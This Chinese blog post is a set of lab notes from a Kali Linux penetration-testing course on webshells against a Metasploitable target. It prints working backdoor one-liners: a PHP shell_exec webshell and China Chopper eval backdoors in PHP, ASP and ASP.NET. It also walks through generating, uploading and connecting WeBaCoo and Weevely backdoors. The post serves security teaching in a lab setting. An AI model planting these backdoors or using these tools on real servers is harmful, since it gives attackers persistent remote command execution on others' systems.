本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. Webshell 演示
2. 中国菜刀的使用
3. http1010101321php
4. 输入密码pass
5. WeBaCoo Web Backdoor Cookie
6. Weevely

1. Webshell 演示


  1. 在被攻击者新建 webshell 文件

    root@metasploitable:/var/www# cat test.php 
    <?php echo shell_exec($_GET['cmd']);?>
    
  2. 攻击者调用 webshell

    http://10.10.10.132/test.php?cmd=id
    

2. 中国菜刀的使用


  1. 一句话木马

    PHP:    <?php @eval($_POST['pass']);?>
    ASP:    <%eval request("pass")%>
    ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
    

  2. 复制 PHP 的一句话木马到服务器

    root@metasploitable:/var/www# cat 1.php 
    <?php @eval($_POST['pass']);?>
    
  3. 菜刀连接


  1. 简介

    • 类终端的shell,只针对 PHP
    • 编码通信内容通过 cookie 头传输,隐蔽性较强
    • Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~
    • cm:bash64 编码之后的命令
    • cn:服务器用于返回数据的 cookie 头的名
    • cp:返回信息定界符
  2. 生成服务器端

    • webacoo -g -o webacoo.php

       -g        Generate backdoor code (-o is required)
       -o        OUTPUT Generated backdoor output filename
      

      root@kali:~# scp webacoo.php msfadmin@10.10.10.132:/tmp
      

  3. 客户端端连接

  4. 通过 cookie 进行传输,抓包分析

    • 抓包

    • 解码查看

      Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~
      root@kali:~# echo aWQ= | base64 -d
      id
      
  5. 其他参数

    Options:
      -g        Generate backdoor code (-o is required)
    
      -f FUNCTION   PHP System function to use
        FUNCTION
            1: system   (default)
            2: shell_exec
            3: exec
            4: passthru
            5: popen
    
      -o OUTPUT Generated backdoor output filename
    
      -r        Return un-obfuscated backdoor code
    
      -t        Establish remote "terminal" connection (-u is required)
    
      -u URL    Backdoor URL
    
      -e CMD    Single command execution mode (-t and -u are required)
    
      -m METHOD HTTP method to be used (default is GET)
    
      -c C_NAME Cookie name (default: "M-cookie")
    
      -d DELIM  Delimiter (default: New random for each request)
    
      -a AGENT  HTTP header user-agent (default exist)
    
      -p PROXY  Use proxy (tor, ip:port or user:pass:ip:port)
    
      -v LEVEL  Verbose level
        LEVEL
            0: no additional info (default)
            1: print HTTP headers
            2: print HTTP headers + data
    
      -l LOG    Log activity to file
    
      -h        Display help and exit
    
      update    Check for updates and apply if any
    

4. Weevely


  1. 简介

    • 隐蔽的终端 PHP Webshell,只针对 PHP
    • 30 多个管理模块

      • 执行系统命令
      • 检查服务器常见配置错误
      • 创建正向、反向 TCP Shell 连接
      • 通过目标计算机代理iHTTP 流量
      • 从目标计算机运行端口扫描,渗透内网
    • 支持连接密码

  2. Kali 缺少库

  3. 生成服务器端

    • weevely generate password path
    • 默认路径在 /usr/share/weevely/

      root@kali:~# weevely generate 123456 weevely.php
      root@kali:/usr/share/weevely# cat weevely.php 
      

    • 上传到 靶机

      root@kali:/usr/share/weevely# scp weevely.php root@10.10.10.132:/var/www
      
  4. 客户端连接服务器

    • weevely URL password cmd

      root@kali:~# weevely http://10.10.10.132/weevely.php 123456
      

  5. 抓包分析

    • 抓包


  6. 连上靶机之后,可以使用 help 命令查看所有模块

    www-data@10.10.10.132:/var/www $ help
    www-data@10.10.10.132:/var/www $ audit_suidsgid /
    www-data@10.10.10.132:/var/www $ audit_filesystem
    

Logo

更多推荐